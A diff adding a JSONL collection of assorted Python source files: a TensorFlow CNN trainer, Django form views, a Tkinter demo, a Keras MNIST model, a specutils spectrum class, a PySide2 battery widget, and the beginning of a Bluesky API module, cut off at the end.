diff --git "a/2621.jsonl" "b/2621.jsonl" new file mode 100644--- /dev/null +++ "b/2621.jsonl" @@ -0,0 +1,679 @@ +{"seq_id":"465474907","text":"# CNN_BC_Trainer\n\nimport sys, os\nsys.path.insert(1, os.path.join(sys.path[0], '../modules'))\nfrom NN_Trainer import NN_Trainer\n\nimport tensorflow as tf\nfrom tensorflow.python.client import timeline\n\nimport numpy as np\nfrom sklearn.metrics import confusion_matrix\nimport matplotlib.pyplot as plt\nimport io\nimport itertools\n\nclass CNN_BC_Trainer(NN_Trainer):\n\n def __init__(self,\n network,\n Data_Creator, # Class\n num_epochs = 100,\n batch_size = 32,\n log_dir = '../logs/',\n model_save_interval = 25,\n pretrained_model_path = None,\n metric_names = ['costs', 'accuracies'],\n sample_keep_prob = 0.80,\n conv_keep_prob = 0.9,\n verbose = True,\n class_names = ['pos', 'neg']):\n \n NN_Trainer.__init__(self,\n network = network,\n Data_Creator = Data_Creator,\n num_epochs = num_epochs,\n batch_size = batch_size,\n log_dir = log_dir,\n model_save_interval = model_save_interval,\n pretrained_model_path = pretrained_model_path,\n metric_names = metric_names,\n verbose = verbose)\n \n\n self.sample_keep_prob = sample_keep_prob\n self.conv_keep_prob = conv_keep_prob\n self.class_names = class_names\n \n def train(self):\n \n self.save_params()\n\n costs = []\n accuracies = []\n\n tf.reset_default_graph()\n \n self._network.create_graph()\n saver = tf.train.Saver()\n\n with tf.Session() as session:\n \n if self.pretrained_model_path == None:\n session.run(tf.global_variables_initializer())\n \n else:\n saver.restore(session, self.pretrained_model_path)\n\n archive_loc = self.log_dir + self._network.name\n training_writer = tf.summary.FileWriter(archive_loc + '/training', session.graph)\n testing_writer = tf.summary.FileWriter(archive_loc + '/testing', session.graph)\n self.model_save_location = archive_loc + '/trained_model.ckpt' \n \n \n self._msg = '\\rtraining';self._vprint(self._msg)\n\n try:\n for epoch in range(self.num_epochs):\n \n \n\n training_inputs, training_labels = self._train_batcher.get_data(); self._train_batcher.gen_data()\n testing_inputs, testing_labels = self._test_batcher.get_data(); self._test_batcher.gen_data() \n\n training_labels = np.asarray(training_labels)\n testing_labels = np.asarray(testing_labels)\n \n # if the division here has a remainde some values are just truncated\n batch_size = self.batch_size\n num_entries = training_inputs.shape[0]\n\n for j in range(int(num_entries/batch_size)):\n self._msg = '\\repoch'\n self._msg += '- {:5.0f}/{:5.0f}'.format(epoch + 1,self.num_epochs)\n self._msg += ' - batch: {:4.0f}/{:4.0f}'.format(j + 1, int(num_entries/batch_size))\n if epoch != 0:\n self._msg += ' - (Training, Testing) - '.format(epoch)\n self._msg += \" costs: ({:0.4f}, {:0.4f})\".format(training_cost, testing_cost)\n self._msg += \" accss: ({:2.2f}, {:2.2f})\".format(training_acc, testing_acc)\n self._vprint(self._msg); \n\n training_inputs_batch = training_inputs[j*batch_size:(j + 1)*batch_size].reshape(-1,1,1024,1)\n training_labels_batch = training_labels[j*batch_size:(j + 1)*batch_size].reshape(-1,2)\n\n feed_dict = {self._network.X: training_inputs_batch,\n self._network.labels: training_labels_batch,\n self._network.sample_keep_prob : self.sample_keep_prob,\n self._network.conv_keep_prob : self.conv_keep_prob,\n self._network.is_training : True}\n\n session.run([self._network.optimizer], feed_dict = feed_dict) \n \n train_feed_dict = {self._network.X: training_inputs.reshape(-1,1,1024,1),\n 
self._network.labels: training_labels.reshape(-1,2),\n self._network.sample_keep_prob : 1.,\n self._network.conv_keep_prob : 1.,\n self._network.is_training : False}\n\n train_predicts = session.run([self._network.predictions], train_feed_dict)\n\n train_feed_dict[self._network.image_buf] = self.plt_confusion_matrix(training_labels.reshape(-1,2), train_predicts)\n\n training_cost, training_acc, training_summary = session.run([self._network.cost,\n self._network.accuracy,\n self._network.summary],\n feed_dict = train_feed_dict) \n\n training_writer.add_summary(training_summary, epoch)\n training_writer.flush() \n \n\n test_feed_dict = {self._network.X: testing_inputs.reshape(-1,1,1024,1),\n self._network.labels: testing_labels.reshape(-1,2),\n self._network.sample_keep_prob : 1.,\n self._network.conv_keep_prob : 1.,\n self._network.is_training : False} \n \n test_predicts = session.run([self._network.predictions], test_feed_dict)\n\n test_feed_dict[self._network.image_buf] = self.plt_confusion_matrix(testing_labels.reshape(-1,2), test_predicts) \n\n\n testing_cost, testing_acc, testing_summary = session.run([self._network.cost,\n self._network.accuracy,\n self._network.summary],\n feed_dict = test_feed_dict)\n\n testing_writer.add_summary(testing_summary, epoch)\n testing_writer.flush()\n \n costs.append((training_cost, testing_cost))\n accuracies.append((training_acc, testing_acc))\n \n if (epoch + 1) % self.model_save_interval == 0:\n saver.save(session, self.model_save_location, epoch + 1)\n \n self._msg = ''\n except KeyboardInterrupt:\n self._msg = ' TRAINING INTERRUPTED' # this never prints; I don't know why\n pass\n\n self._msg += '\\rtraining ended'; self._vprint(self._msg)\n \n training_writer.close()\n testing_writer.close()\n\n\n session.close()\n self._msg += ' - session closed'; self._vprint(self._msg)\n self._msg = ''\n\n self._metrics = [costs, accuracies]\n self.save_metrics()\n\n\n\n def plt_confusion_matrix(self, labels, pred, normalize=False, title='Confusion matrix'):\n \"\"\"\n Given one-hot encoded labels and preds, displays a confusion matrix.\n Arguments:\n `labels`:\n The ground truth one-hot encoded labels.\n `pred`:\n The one-hot encoded labels predicted by a model.\n `normalize`:\n If True, divides every column of the confusion matrix\n by its sum. This is helpful when, for instance, there are 1000\n 'A' labels and 5 'B' labels. 
Normalizing this set would\n make the color coding more meaningful and informative.\n \"\"\"\n labels = [label.argmax() for label in np.asarray(labels).reshape(-1,2)] # bc\n pred = [label.argmax() for label in np.asarray(pred).reshape(-1,2)] #bc\n\n classes = self.class_names\n\n cm = confusion_matrix(labels, pred)\n\n #if normalize:\n cm = cm.astype('float')*100 / cm.sum(axis=1)[:, np.newaxis]\n cm = np.nan_to_num(cm, copy=True)\n cm = cm.astype('int')\n\n fig, ax = plt.subplots(figsize = (5,5), dpi = 144)\n im = ax.imshow(cm, interpolation='nearest', aspect='auto', cmap=plt.cm.Oranges, vmin = 0, vmax = 100)\n ax.set_title(title)\n cbar = fig.colorbar(im)\n tick_marks = np.arange(len(classes))\n ax.set_xticks(tick_marks)\n ax.set_xticklabels(classes)\n ax.set_yticks(tick_marks)\n ax.set_yticklabels(classes)\n\n ax.set_ylabel('True label')\n ax.set_xlabel('Predicted label')\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n #s = '{:2.0}'.format(cm[i, j]) if cm[i,j] >= 1 else '.'\n ax.text(j, i, format(cm[i, j], 'd') if cm[i,j]!=0 else '.',\n horizontalalignment=\"center\", fontsize=15, verticalalignment='center', color= \"black\")\n\n # plt.show()\n buf = io.BytesIO()\n fig.savefig(buf, format='png', dpi = 144)\n plt.close(fig)\n buf.seek(0)\n\n return buf.getvalue()","sub_path":"aas/Estimating Delays/nn/network_trainers/CNN_BC_Trainer.py","file_name":"CNN_BC_Trainer.py","file_ext":"py","file_size_in_byte":9963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"397146723","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom forms import UserForm, PostForm\nfrom models import *\n\n# Create your views here.\ndef display_page(request):\n\tposts = Post.objects.all()\n\tusers = User.objects.all()\n\tcontext = {'userform':UserForm, 'postform':PostForm}\n\treturn render(request, 'page.html', context)\n\ndef get_name(request):\n # if this is a POST request we need to process the form data\n if request.method == 'POST':\n # create a form instance and populate it with data from the request:\n form = UserForm(request.POST)\n # check whether it's valid:\n if form.is_valid():\n name_from_form = request.POST['name']\n email_from_form = request.POST['email']\n score_from_form = request.POST['score']\n user = User(name=name_from_form, email=email_from_form)\n user.score = score_from_form\n user.save()\n # process the data in form.cleaned_data as required\n # ...\n # redirect to a new URL:\n return HttpResponse('Thanks!!!!!!!!!')\n\n # if a GET (or any other method) we'll create a blank form\n else:\n form = UserForm()\n\n return render(request, 'page.html', {'form':form})\n\ndef create_post(request):\n if request.method == 'POST':\n form=PostForm(request.POST)\n if form.is_valid():\n title_from_form = request.POST['title']\n text_from_form = request.POST['text']\n tag_from_form = request.POST['tag']\n post = Post(title = title_from_form, text=text_from_form, tag=tag_from_form)\n post.save()\n\n return HttpResponse('Thanks!!')\n else:\n form = PostForm()\n\n return render(request, 'page.html', {'form':form})\n\n\n","sub_path":"agora/board/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"152754964","text":"# IMPORT LIBRARIES\nimport tkinter\nfrom tkinter import messagebox\n\n\n# APPLICATION ELEMENTS\n# **************************************************\ntop = 
tkinter.Tk()\n\n\n# ACTION LISTENERS\n# **************************************************\ndef helloCallBack():\n messagebox.showinfo( \"Hello Python\", \"Hello World\")\n\nB = tkinter.Button(top, text =\"Hello\", command = helloCallBack)\n\n\n# LAYOUT GENERATION\n# **************************************************\nB.pack()\ntop.mainloop()","sub_path":"GUI/hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"331249628","text":"import logging\n\nimport numpy as np\nfrom astropy import units as u\nfrom astropy.nddata import NDDataRef\nfrom astropy.utils.decorators import lazyproperty\nfrom astropy.nddata import NDUncertainty\nfrom ..wcs import WCSWrapper, WCSAdapter\nfrom .spectrum_mixin import OneDSpectrumMixin\n\n__all__ = ['Spectrum1D']\n\n__doctest_skip__ = ['Spectrum1D.spectral_resolution']\n\n\nclass Spectrum1D(OneDSpectrumMixin, NDDataRef):\n \"\"\"\n Spectrum container for 1D spectral data.\n\n Parameters\n ----------\n flux : `astropy.units.Quantity` or astropy.nddata.NDData`-like\n The flux data for this spectrum.\n spectral_axis : `astropy.units.Quantity`\n Dispersion information with the same shape as the last (or only)\n dimension of flux.\n wcs : `astropy.wcs.WCS` or `gwcs.wcs.WCS`\n WCS information object.\n velocity_convention : {\"doppler_relativistic\", \"doppler_optical\", \"doppler_radio\"}\n Convention used for velocity conversions.\n rest_value : `~astropy.units.Quantity`\n Any quantity supported by the standard spectral equivalencies\n (wavelength, energy, frequency, wave number). Describes the rest value\n of the spectral axis for use with velocity conversions.\n uncertainty : `~astropy.nddata.NDUncertainty`\n Contains uncertainty information along with propagation rules for\n spectrum arithmetic. Can take a unit, but if none is given, will use\n the unit defined in the flux.\n meta : dict\n Arbitrary container for any user-specific information to be carried\n around with the spectrum container object.\n \"\"\"\n def __init__(self, flux=None, spectral_axis=None, wcs=None,\n velocity_convention=None, rest_value=None, *args, **kwargs):\n # If the flux (data) argument is a subclass of nddataref (as it would\n # be for internal arithmetic operations), avoid setup entirely.\n if isinstance(flux, NDDataRef):\n self._velocity_convention = flux._velocity_convention\n self._rest_value = flux._rest_value\n\n super(Spectrum1D, self).__init__(flux)\n return\n\n # Ensure that the flux argument is an astropy quantity\n if flux is not None and not isinstance(flux, u.Quantity):\n raise ValueError(\"Flux must be a `Quantity` object.\")\n\n # In cases of slicing, new objects will be initialized with `data`\n # instead of `flux`. Ensure we grab the `data` argument.\n if flux is None and 'data' in kwargs:\n flux = kwargs.pop('data')\n\n # Ensure that the unit information codified in the quantity object is\n # the One True Unit.\n kwargs.setdefault('unit', flux.unit if isinstance(flux, u.Quantity)\n else kwargs.get('unit'))\n\n # Attempt to parse the spectral axis. If none is given, try instead to\n # parse a given wcs. 
This is put into a GWCS object to\n # then be used behind-the-scenes for all specutils operations.\n if spectral_axis is not None:\n # Ensure that the spectral axis is an astropy quantity\n if not isinstance(spectral_axis, u.Quantity):\n raise ValueError(\"Spectral axis must be a `Quantity` object.\")\n\n wcs = WCSWrapper.from_array(spectral_axis)\n elif wcs is not None:\n if not issubclass(wcs.__class__, WCSAdapter):\n wcs = WCSWrapper(wcs)\n elif isinstance(flux, float) or isinstance(flux, int) or isinstance(flux, np.ndarray):\n # In the case where the arithmetic operation is being performed with\n # a single float, int, or array object, just go ahead and ignore wcs\n # requirements\n super(Spectrum1D, self).__init__(data=flux)\n return\n else:\n # If no wcs and no spectral axis has been given, raise an error\n raise LookupError(\"No WCS object or spectral axis information has \"\n \"been given. Please provide one.\")\n\n self._velocity_convention = velocity_convention\n\n if rest_value is None:\n if wcs.rest_frequency != 0:\n self._rest_value = wcs.rest_frequency * u.Hz\n elif wcs.rest_wavelength != 0:\n self._rest_value = wcs.rest_wavelength * u.AA\n else:\n self._rest_value = 0 * u.AA\n else:\n self._rest_value = rest_value\n\n if not isinstance(self._rest_value, u.Quantity):\n logging.info(\"No unit information provided with rest value. \"\n \"Assuming units of spectral axis ('%s').\",\n spectral_axis.unit)\n self._rest_value = u.Quantity(rest_value, spectral_axis.unit)\n elif not self._rest_value.unit.is_equivalent(u.AA) and not self._rest_value.unit.is_equivalent(u.Hz):\n raise u.UnitsError(\"Rest value must be energy/wavelength/frequency equivalent.\")\n\n super(Spectrum1D, self).__init__(\n data=flux.value if isinstance(flux, u.Quantity) else flux,\n wcs=wcs, **kwargs)\n\n @property\n def frequency(self):\n \"\"\"\n The frequency as a `~astropy.units.Quantity` in units of GHz\n \"\"\"\n return self.spectral_axis.to(u.GHz, u.spectral())\n\n @property\n def wavelength(self):\n \"\"\"\n The wavelength as a `~astropy.units.Quantity` in units of Angstroms\n \"\"\"\n return self.spectral_axis.to(u.AA, u.spectral())\n\n @property\n def energy(self):\n \"\"\"\n The energy of the spectral axis as a `~astropy.units.Quantity` in units\n of eV.\n \"\"\"\n return self.spectral_axis.to(u.eV, u.spectral())\n\n @property\n def photon_flux(self):\n \"\"\"\n The flux density of photons as a `~astropy.units.Quantity`, in units of\n photons per cm^2 per second per spectral_axis unit\n \"\"\"\n flux_in_spectral_axis_units = self.flux.to(u.W * u.cm**-2 * self.spectral_axis.unit**-1, u.spectral_density(self.spectral_axis))\n photon_flux_density = flux_in_spectral_axis_units / (self.energy / u.photon)\n return photon_flux_density.to(u.photon * u.cm**-2 * u.s**-1 *\n self.spectral_axis.unit**-1)\n\n @lazyproperty\n def bin_edges(self):\n return self.wcs.bin_edges()\n\n @property\n def shape(self):\n return self.flux.shape\n\n @staticmethod\n def _compare_wcs(this_operand, other_operand):\n \"\"\"\n NNData arithmetic callable to determine if two wcs's are compatible.\n \"\"\"\n # If the other operand is a simple number or array, allow the operations\n if (isinstance(other_operand, float) or isinstance(other_operand, int)\n or isinstance(other_operand, np.ndarray)):\n return True\n\n # First check if units are equivalent, if so, create a new spectrum\n # object with spectral axis in compatible units\n other_wcs = other_operand.wcs.with_spectral_unit(\n this_operand.wcs.spectral_axis_unit,\n 
rest_value=this_operand._rest_value,\n velocity_convention=this_operand._velocity_convention)\n\n if other_wcs is None:\n return False\n\n # Check if the shape of the axes are compatible\n if this_operand.spectral_axis.shape != other_operand.spectral_axis.shape:\n logging.error(\"Shape of spectral axes between operands must be \"\n \"equivalent.\")\n return False\n\n # And that they cover the same range\n if (this_operand.spectral_axis[0] != other_operand.spectral_axis[0] or\n this_operand.spectral_axis[-1] != other_operand.spectral_axis[-1]):\n logging.error(\"Spectral axes between operands must cover the \"\n \"same range. Interpolation may be required.\")\n return False\n\n # Check if the delta dispersion is equivalent between the two axes\n if not np.array_equal(np.diff(this_operand.spectral_axis),\n np.diff(other_operand.spectral_axis)):\n logging.error(\"Delta dispersion of spectral axes of operands \"\n \"must be equivalent. Interpolation may be required.\")\n return False\n\n return True\n\n def __add__(self, other):\n if not isinstance(other, NDDataRef):\n other = u.Quantity(other, unit=self.unit)\n\n return self.add(\n other, compare_wcs=lambda o1, o2: self._compare_wcs(self, other))\n\n def __sub__(self, other):\n if not isinstance(other, NDDataRef):\n other = u.Quantity(other, unit=self.unit)\n\n return self.subtract(\n other, compare_wcs=lambda o1, o2: self._compare_wcs(self, other))\n\n def __mul__(self, other):\n if not isinstance(other, NDDataRef):\n other = u.Quantity(other)\n\n return self.multiply(\n other, compare_wcs=lambda o1, o2: self._compare_wcs(self, other))\n\n def __div__(self, other):\n if not isinstance(other, NDDataRef):\n other = u.Quantity(other)\n\n return self.divide(\n other, compare_wcs=lambda o1, o2: self._compare_wcs(self, other))\n\n def __truediv__(self, other):\n if not isinstance(other, NDDataRef):\n other = u.Quantity(other)\n\n return self.divide(\n other, compare_wcs=lambda o1, o2: self._compare_wcs(self, other))\n\n def _format_array_summary(self, label, array):\n if len(array) > 0:\n mean = np.mean(array)\n s = \"{:17} [ {:.5}, ..., {:.5} ], mean={:.5}\"\n return s.format(label+':', array[0], array[-1], mean)\n else:\n return \"{:17} [ ], mean= n/a\".format(label+':')\n\n def __str__(self):\n result = \"Spectrum1D \"\n # Handle case of single value flux\n if self.flux.ndim == 0:\n result += \"(length=1)\\n\"\n return result + \"flux: {}\".format(self.flux)\n\n # Handle case of multiple flux arrays\n result += \"(length={})\\n\".format(len(self.spectral_axis))\n if self.flux.ndim > 1:\n for i, flux in enumerate(self.flux):\n label = 'flux{:2}'.format(i)\n result += self._format_array_summary(label, flux) + '\\n'\n else:\n result += self._format_array_summary('flux', self.flux) + '\\n'\n # Add information about spectral axis\n result += self._format_array_summary('spectral axis', self.spectral_axis)\n # Add information about uncertainties if available\n if self.uncertainty:\n result += \"\\nuncertainty: [ {}, ..., {} ]\".format(\n self.uncertainty[0], self.uncertainty[-1])\n return result\n\n def __repr__(self):\n inner_str = \"flux={}, spectral_axis={}\".format(repr(self.flux),\n repr(self.spectral_axis))\n\n if self.uncertainty is not None:\n inner_str += \", uncertainty={}\".format(repr(self.uncertainty))\n\n result = \"<Spectrum1D({})>\".format(inner_str)\n\n return result\n\n\n def spectral_resolution(self, true_dispersion, delta_dispersion, axis=-1):\n \"\"\"Evaluate the probability distribution of the spectral resolution.\n\n Examples\n --------\n\n To tabulate a binned resolution function at 6000A covering +/-10A in\n 0.2A steps:\n\n >>> R = spectrum1d.spectral_resolution(\n ... 6000 * u.Angstrom, np.linspace(-10, 10, 51) * u.Angstrom)\n >>> assert R.shape == (50,)\n >>> assert np.allclose(R.sum(), 1.)\n\n To build a sparse resolution matrix for true wavelengths 4000-8000A\n in 0.1A steps:\n\n >>> R = spectrum1d.spectral_resolution(\n ... np.linspace(4000, 8000, 40001)[:, np.newaxis] * u.Angstrom,\n ... np.linspace(-10, +10, 201) * u.Angstrom)\n >>> assert R.shape == (40000, 200)\n >>> assert np.allclose(R.sum(axis=1), 1.)\n\n Parameters\n ----------\n true_dispersion : `~astropy.units.Quantity`\n True value(s) of dispersion for which the resolution should be\n evaluated.\n delta_dispersion : `~astropy.units.Quantity`\n Array of (observed - true) dispersion bin edges to integrate the\n resolution probability density over.\n axis : int\n Which axis of ``delta_dispersion`` contains the strictly increasing\n dispersion values to interpret as bin edges. The dimension of\n ``delta_dispersion`` along this axis must be at least two.\n\n Returns\n -------\n numpy array\n Array of dimensionless probabilities calculated as the integral of\n P(observed | true) over each bin in (observed - true). The output\n shape is the result of broadcasting the input shapes.\n\n \"\"\"\n pass\n","sub_path":"specutils/spectra/spectrum1d.py","file_name":"spectrum1d.py","file_ext":"py","file_size_in_byte":12955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"48175125","text":"from PySide2.QtWidgets import QProgressBar,QMessageBox\nfrom PySide2.QtGui import QPainter,QPainterPath,QPen\nfrom PySide2 import QtGui, QtCore\nfrom PySide2.QtCore import Signal\n\nOK_STYLE='''\n QProgressBar {\n border: 4px solid white;\n background-color: rgb(41, 45, 56);\n margin-top: 12px;\n }\n QProgressBar:horizontal {\n height: 60px;\n width: 120px;\n margin-right: 12px;\n }\n QProgressBar:vertical {\n height: 120px;\n width: 60px;\n margin-left: 12px;\n }\n QProgressBar::chunk {\n background-color: white;\n margin: 4px;\n }'''\nWARNING_STYLE='''\n QProgressBar {\n border: 4px solid yellow;\n background-color: rgb(41, 45, 56);\n margin-top: 12px;\n }\n QProgressBar:horizontal {\n height: 60px;\n width: 120px;\n margin-right: 12px;\n }\n QProgressBar:vertical {\n height: 120px;\n width: 60px;\n margin-left: 12px;\n }\n QProgressBar::chunk {\n background-color: yellow;\n margin: 4px;\n }'''\nLOW_STYLE='''\n QProgressBar {\n border: 4px solid red;\n background-color: rgb(41, 45, 56);\n margin-top: 12px;\n }\n QProgressBar:horizontal {\n height: 60px;\n width: 120px;\n margin-right: 12px;\n }\n QProgressBar:vertical {\n height: 120px;\n width: 60px;\n margin-left: 12px;\n }\n QProgressBar::chunk {\n background-color: red;\n margin: 4px;\n }'''\n\n\nclass Battery(QProgressBar):\n def __init__(self, *args, **kwargs):\n super(Battery, self).__init__(*args, **kwargs)\n self.setTextVisible(False)\n self.charging = False\n self.state = \"Ok\"; # Can be \"Warning\" or \"Low\"\n self.voltOfCharge = {100: 12.73, 90: 12.62, 80: 12.5, 70: 12.37, 60: 12.24, 50: 12.1, 40: 11.96, 30: 11.81,\n 20: 11.66, 10: 11.51}\n self.setMaximum(100)\n self.setMinimum(0)\n self.color= QtCore.Qt.white\n self.setValue(100)\n self.setStyleSheet(OK_STYLE)\n\n def level_to_volt(self,level):\n voltage=11.4;\n for key in self.voltOfCharge:\n if(key<=level):\n voltage = (level%10)/10 * (self.voltOfCharge[key + 10] - self.voltOfCharge[key]) + self.voltOfCharge[key]\n return voltage\n def volt_to_level(self,volt):\n level=0;\n res = 1 ## if the battery resolution is 10\n\n for key in self.voltOfCharge:\n if(self.voltOfCharge[key]<=volt):\n if(res==10):\n level=key\n if (res == 1): # not checked\n if(key<100):\n if(volt>self.voltOfCharge[key]):\n level=int((volt-self.voltOfCharge[key])/(self.voltOfCharge[key+10]-self.voltOfCharge[key])*10 + key);\n else:\n level=key;\n else:\n level=100;\n break;\n return level\n def reset(self):\n self.state=\"Ok\"\n self.setValue(100)\n def setBatLevel(self, voltage):\n b_level=self.volt_to_level(voltage)\n self.setValue(b_level)\n if (b_level >= 50 and not self.state == \"Ok\"):\n self.state=\"Ok\"\n # self.color = QtCore.Qt.white\n # self.setStyleSheet(OK_STYLE)\n if(b_level <= 30 and b_level > 15 and self.state == \"Ok\"):\n self.state = \"Warning\"\n # self.color = QtCore.Qt.yellow\n # self.setStyleSheet(WARNING_STYLE)\n if (b_level <= 15 and not self.state == \"Low\"):\n self.state = \"Low\"\n # self.color = QtCore.Qt.red\n # self.setStyleSheet(LOW_STYLE)\n self.repaint()\n\n def setCharging(self, state):\n self.charging = state\n self.repaint()\n\n def paintEvent(self, event):\n super(Battery, self).paintEvent(event)\n qp = QPainter(self)\n qp.setPen(QtCore.Qt.NoPen);\n qp.setBrush(self.color)\n w, h = self.width(), self.height()\n if self.orientation() == QtCore.Qt.Horizontal:\n qp.drawRect(w, 12 + h / 4, -12, h / 2 - 12)\n dx, dy = 0, 12\n else:\n qp.drawRect(12 + w / 4, 0, w / 2 - 12, 12)\n dx, dy = 12, 0\n\n qp.setPen(QtCore.Qt.gray)\n font=qp.font()\n font.setPointSize(font.pointSize()*1.5)\n qp.setFont(font)\n qp.drawText(self.rect().adjusted(dx, dy, 0, 0), QtCore.Qt.AlignCenter, self.text())\n qp.setPen(QtCore.Qt.NoPen)\n\n if self.charging:\n qp.setBrush(self.parent().palette().window())\n qp.setBrush(self.color)\n path = QPainterPath()\n if self.orientation() == QtCore.Qt.Horizontal:\n qp.drawRect(0, 0, 12, h)\n path.moveTo(12, h)\n path.lineTo(12, 12 + h / 3)\n path.quadTo(22, 12 + h / 3, 22, 24)\n path.lineTo(22, 14)\n path.lineTo(2, 14)\n path.lineTo(2, 24)\n path.quadTo(2, 12 + h / 3, 12, 12 + h / 3)\n path.moveTo(7, 12);\n path.lineTo(7, 0)\n path.moveTo(17, 12);\n path.lineTo(17, 0)\n else:\n qp.drawRect(0, h, w, -12)\n path.moveTo(w, h - 12)\n path.lineTo(12 + w / 3, h - 12)\n path.quadTo(12 + w / 3, h - 22, 24, h - 22)\n path.lineTo(14, h - 22)\n path.lineTo(14, h - 2)\n path.lineTo(24, h - 2)\n path.quadTo(12 + w / 3, h - 2, 12 + w / 3, h - 12)\n path.moveTo(12, h - 7);\n path.lineTo(0, h - 7)\n path.moveTo(12, h - 17);\n path.lineTo(0, h - 17)\n\n pen = QPen(qp.brush(), 12, QtCore.Qt.SolidLine, QtCore.Qt.SquareCap, QtCore.Qt.MiterJoin)\n qp.strokePath(path, pen)\n pen.setWidth(4);\n pen.setColor(self.color);\n qp.setPen(pen)\n #qp.setBrush(self.palette().window())\n qp.setBrush(self.color)\n qp.drawPath(path)\n","sub_path":"v2/Battery.py","file_name":"Battery.py","file_ext":"py","file_size_in_byte":6402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"96861977","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n # @param head, a ListNode\n # @return a list node\n def detectCycle(self, head):\n stk=[]\n tmp=head\n while tmp:\n if stk.count(tmp)>0:\n return tmp\n stk.append(tmp)\n tmp=tmp.next\n return None\n 
","sub_path":"linklistcycle2.py","file_name":"linklistcycle2.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"320018357","text":"\"\"\" Like logistic_regression_tf_full.py but the subgraph for performing a step of the \ngradient descent optimizer is added using a tensorflow function.\n\n\"\"\"\n\nfrom keras.layers import Input, Dense, Conv2D, MaxPooling2D, Flatten, Dropout\nfrom keras.models import Model\nimport keras\n\nfrom load_mnist import load_mnist\nimport numpy as np\nimport math\n\n\ndef main():\n log_dir = '/tmp/mnist/nn_keras'\n\n train_data, validate_data, test_data = load_mnist('mnist.pkl.gz')\n\n \n # design matrix of shape (num_examples, input_width, input_width, channels=1);\n # reshape flattened sample vector into a samples image\n input_width = 28\n x_all = np.reshape(train_data[0], (-1, input_width, input_width, 1))\n num_examples = x_all.shape[0]\n \n # label matrix (N x 1)\n c_all = train_data[1]\n \n K = 10 # number of classes\n # target variable (num_examples, K)\n t_all = keras.utils.to_categorical(c_all)\n \n # the same for the test data\n test_x = np.reshape(test_data[0], (-1, input_width, input_width, 1))\n test_c = test_data[1]\n test_t = keras.utils.to_categorical(test_c, K)\n \n\n batch_size = 128\n # learning rate\n eta = 0.05\n max_epochs = 200\n\n # We use ReLU neurons for all but the last layers\n relu = keras.activations.relu\n\n # the network layers\n x = Input(shape=(input_width, input_width, 1))\n\n h_c1 = Conv2D(32, (5, 5), activation=relu)(x)\n h_p1 = MaxPooling2D(pool_size=(2,2))(h_c1)\n\n h_c2 = Conv2D(64, (5, 5), activation=relu)(h_p1)\n h_p2 = MaxPooling2D(pool_size=(2,2))(h_c2)\n\n h_p2_flat = Flatten()(h_p2)\n\n h_d1 = Dense(1024, activation=relu)(h_p2_flat)\n\n h_d1_dropout = Dropout(0.5)(h_d1)\n\n y = Dense(K, activation=keras.activations.softmax)(h_d1_dropout)\n\n # Define the model and create the computational graph.\n model = Model(inputs=x, outputs=y)\n\n print('---------------------------------')\n for l in model.layers:\n print(l.name)\n\n model.compile(loss=keras.losses.categorical_crossentropy,\n optimizer=keras.optimizers.SGD(lr=eta),\n metrics=[keras.metrics.categorical_accuracy])\n\n # Train the model.\n model.fit(x_all, t_all,\n batch_size=batch_size,\n epochs=max_epochs,\n validation_data=(test_x, test_t), \n #callbacks=[keras.callbacks.TensorBoard(log_dir=log_dir, histogram_freq=10)]\n )\n\n # Evaluate the model\n score = model.evaluate(test_x, test_t, verbose=0)\n\n print('Test loss:', score[0])\n print('Test accuracy:', score[1])\n\n\nmain()\n","sub_path":"mnist/cnn_2.py","file_name":"cnn_2.py","file_ext":"py","file_size_in_byte":2594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"244105344","text":"\"\"\"Bluesky source class.\n\nhttps://bsky.app/\nhttps://atproto.com/lexicons/app-bsky-actor\nhttps://github.com/bluesky-social/atproto/tree/main/lexicons/app/bsky\n\"\"\"\nimport copy\nimport json\nimport logging\nimport re\nfrom pathlib import Path\nimport urllib.parse\n\nfrom lexrpc import Client\nfrom oauth_dropins.webutil import util\n\nfrom . import as1\nfrom .source import FRIENDS, Source, OMIT_LINK\n\nlogger = logging.getLogger(__name__)\n\n# list of dict JSON app.bsky.* lexicons. 
_load_lexicons lazy loads them from the\n# lexicons/ dir.\nLEXICONS = []\n\n# via https://atproto.com/specs/handle\nHANDLE_REGEX = (\n r'([a-zA-Z0-9]([a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?\\.)+'\n r'[a-zA-Z]([a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?$'\n)\nHANDLE_PATTERN = re.compile(r'^' + HANDLE_REGEX)\nDID_WEB_PATTERN = re.compile(r'^did:web:' + HANDLE_REGEX)\n\ndef _maybe_load_lexicons():\n if not LEXICONS:\n for filename in (Path(__file__).parent / 'lexicons').glob('**/*.json'):\n with open(filename) as f:\n LEXICONS.append(json.load(f))\n\n# Maps AT Protocol NSID collections to path elements in bsky.app URLs.\n# Used in at_uri_to_web_url.\n#\n# eg for mapping a URI like:\n# at://did:plc:z72i7hd/app.bsky.feed.generator/mutuals\n# to a frontend URL like:\n# https://bsky.app/profile/did:plc:z72i7hdynmk6r22z27h6tvur/feed/mutuals\nCOLLECTIONS = {\n 'app.bsky.feed.post': 'post',\n 'app.bsky.feed.generator': 'feed',\n}\n\n\ndef url_to_did_web(url):\n \"\"\"Converts a URL to a did:web.\n\n In AT Proto, only hostname-based web DIDs are supported.\n Paths are not supported, and will be discarded.\n\n Examples:\n * 'https://foo.com' => 'did:web:foo.com'\n * 'https://foo.com:3000' => 'did:web:foo.com'\n * 'https://foo.bar.com/baz/baj' => 